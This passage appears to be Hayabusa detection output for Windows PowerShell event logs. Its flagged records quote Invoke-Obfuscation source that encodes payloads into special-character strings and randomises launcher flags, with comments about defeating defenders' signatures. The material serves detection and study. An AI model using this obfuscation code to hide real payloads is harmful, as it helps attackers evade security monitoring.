Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.279 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? \""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. $NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.279 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } 